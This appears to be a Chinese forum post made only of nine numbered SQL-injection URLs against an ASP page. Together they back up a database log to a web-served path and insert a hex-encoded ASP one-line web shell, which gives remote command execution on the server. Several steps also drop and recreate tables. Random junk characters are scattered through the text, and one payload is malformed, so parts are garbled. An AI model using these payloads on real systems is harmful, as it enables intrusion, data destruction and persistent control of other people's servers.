第一步' z5 r% l$ ?# O" q8 I
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--" H6 S! Y: w/ f
3 O& ]$ c! e) @# L
第二步:
; ~! k9 a5 {' c, c6 j4 X! x6 v) ghttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--. O; [4 n/ k0 }: X# M
3 Z9 a. e% j, D3 r1 n% A; F% u& \) X' B
第三步4 J+ [' @, b `
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
4 Z$ t6 S9 c: S) ~) c
( V" }. Y( Z3 \7 M第四步: ~/ Y( C; _" L* L
http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--* D7 Q2 s/ |) h7 f" I
4 m& @% X# a4 ~3 x
第五步; T2 ?7 z7 R3 o, L n
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
% b; ^7 A$ p2 g. q# h5 W, Q4 w
J C% @2 C% y9 C/ t" h1 f第六步% `) \1 S: s# J1 K
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
( K+ o- k) } i% w# k; k/ C
- N: {7 @8 d% }6 s( A第七步
/ U% e$ m5 @" ^1 ^& a! whttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--- e9 W5 b1 P7 @& p
# v- Z m) Q. a7 e) s# t, e第八步
5 x2 R1 ^2 g" k4 Z$ R, g8 t% }0 _http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
' S% k7 y# P. y- W( u2 | p# j3 n! r' D; o" e7 ~0 V
第九步
, e; o) I. p4 j. X9 ghttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
/ z1 @- F; J/ K |